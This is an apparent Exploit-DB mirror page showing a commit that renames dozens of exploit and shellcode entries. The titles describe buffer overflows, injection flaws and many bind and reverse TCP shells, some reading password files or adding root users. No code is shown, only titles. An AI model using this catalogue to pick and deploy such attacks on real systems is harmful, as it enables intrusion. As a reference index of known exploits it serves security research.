bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/java/webapps/43594.txt
Offensive Security 50c008ba06 DB: 2018-01-16 
39 changes to exploits/shellcodes

OBS studio 20.1.3 - Local Buffer Overflow

Kingsoft Antivirus/Internet Security 9+ - Privilege Escalation
Kingsoft Antivirus/Internet Security 9+ - Local Privilege Escalation
SysGauge Server 3.6.18 - Buffer Overflow
Disk Pulse Enterprise 10.1.18 - Buffer Overflow
Synology Photo Station 6.8.2-3461 - 'SYNOPHOTO_Flickr_MultiUpload' Race Condition File Write Remote Code Execution
ImgHosting 1.5 - Cross-Site Scripting
Domains & Hostings Manager PRO 3.0 - Authentication Bypass
PerfexCRM 1.9.7 - Arbitrary File Upload
RISE 1.9 - 'search' SQL Injection
Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect
Adminer 4.3.1 - Server-Side Request Forgery
Oracle PeopleSoft 8.5x - Remote Code Execution
ILIAS < 5.2.4 - Cross-Site Scripting
Flash Operator Panel 2.31.03 - Command Execution

pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection

BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)
BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)

BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes)
BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes)
BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)
BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)
BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes)
BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes)

BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)
BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes)

BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)
BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)

FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)
FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)

FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)

FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)
FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes)

FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)

Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)
Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator)

Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode
Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode
Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)
Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator)
Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes)

Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)
Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes)
Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)
Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)
Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes)
Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes)
Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes)

Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes)
Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes)

Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)
Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes)
Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes)
Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator)

Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes)
Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes)
Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes)
Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes)

Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)
Linux/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell Shellcode (74 bytes)

Linux/x86 - Bind TCP Shell (5074/TCP) ToUpper Encoded Shellcode (226 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell + ToUpper Encoded Shellcode (226 bytes)

Linux/x86 - Reverse TCP /bin/sh Shell Shellcode (120 bytes)
Linux/x86 - Reverse TCP Shell (/bin/sh) Shellcode (120 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) Shellcode (92 bytes)
Linux/x86 - Bind TCP Shell (5074/TCP) + fork() Shellcode (130 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell Shellcode (92 bytes)
Linux/x86 - Bind TCP (5074/TCP) Shell + fork() Shellcode (130 bytes)

Linux/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (132 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (132 bytes)
NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL); Shellcode (30 bytes)
NetBSD/x86 - Reverse TCP (6666/TCP) Shell Shellcode (83 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (29 bytes)
NetBSD/x86 - setreuid(0_ 0) + execve(_/bin//sh__ ..._ NULL) Shellcode (30 bytes)

OpenBSD/x86 - Bind TCP Shell (6969/TCP) Shellcode (148 bytes)
OpenBSD/x86 - Bind TCP (6969/TCP) Shell Shellcode (148 bytes)

Solaris/SPARC - Reverse TCP Shell (44434/TCP) XNOR Encoded Shellcode (600 bytes) (Generator)
Solaris/SPARC - Reverse TCP (44434/TCP) Shell + XNOR Encoded Shellcode (600 bytes) (Generator)

Solaris/SPARC - Bind TCP Shell (6666/TCP) Shellcode (240 bytes)
Solaris/SPARC - Bind TCP (6666/TCP) Shell Shellcode (240 bytes)
Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP /bin/sh Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)
Solaris/SPARC - Bind TCP (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
Solaris/SPARC - Reverse TCP (192.168.1.4:5678/TCP) Shell (/bin/sh) Shellcode (204 bytes)

Windows 5.0 < 7.0 x86 - Bind TCP Shell (28876/TCP) Null-Free Shellcode
Windows 5.0 < 7.0 x86 - Bind TCP (28876/TCP) Shell + Null-Free Shellcode

Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53/TCP) Shellcode (275 bytes) (Generator)
Windows XP/2000/2003 - Reverse TCP (127.0.0.1:53/TCP) Shell Shellcode (275 bytes) (Generator)

Windows XP SP1 - Bind TCP Shell (58821/TCP) Shellcode (116 bytes)
Windows XP SP1 - Bind TCP (58821/TCP) Shell Shellcode (116 bytes)

FreeBSD/x86 - Bind TCP /bin/sh Shell (1337/TCP) Shellcode (167 bytes)
FreeBSD/x86 - Bind TCP (1337/TCP) Shell (/bin/sh) Shellcode (167 bytes)

Linux/x86 - Bind Netcat Shell (13377/TCP) Shellcode
Linux/x86 - Bind TCP (13377/TCP) Netcat Shell Shellcode

Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes)
Linux/x86 - Reverse TCP (8080/TCP) Netcat Shell Shellcode (76 bytes)

Linux/x86 - Bind TCP Shell (31337/TCP) + setreuid(0_0) Polymorphic Shellcode (131 bytes)
Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes)
Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)
Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)
Linux - Bind TCP (6778/TCP) Shell + XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)

BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)
BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)
Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode
Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode
Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode
Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)
FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)
FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + Fork Shellcode (111 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)

Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes)
Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)

Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)
Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)

Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)

Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)
Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)

Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)
Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)

Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes)
Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)

Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode
Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode
Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)
Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode
Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)
Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)
Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)

Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)
Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)

Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)

Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)
Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)

OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)
OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)

Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)
Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)

Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)

Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)
Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)
Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)
Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)

Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)
Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)

Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)
Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)

Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)

Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)
Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (98 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + Fork + IPv4/6 + Password + Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)

Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)
Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close Shellcode (358 bytes)
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.9:4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (138 bytes)
Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (doomedra) Shellcode (175 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (118 bytes)
Linux/x86-64 - Bind TCP (1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (131 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (85 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/csh_ [/bin/csh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/ksh_ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - setreuid(0_0) + execve(/bin/zsh_ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (87 bytes)
Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)
OpenBSD/x86 - reboot() Shellcode (15 bytes)

Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)
Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)

Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)
Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)

Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)
Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)
Linux - Bind TCP Shell + Dual/Multi Mode Shellcode (156 bytes)

Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (65 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)
Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)
Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)
Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)

Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)

Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)

FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)
FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)

FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)
FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)

IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)
IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)

Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
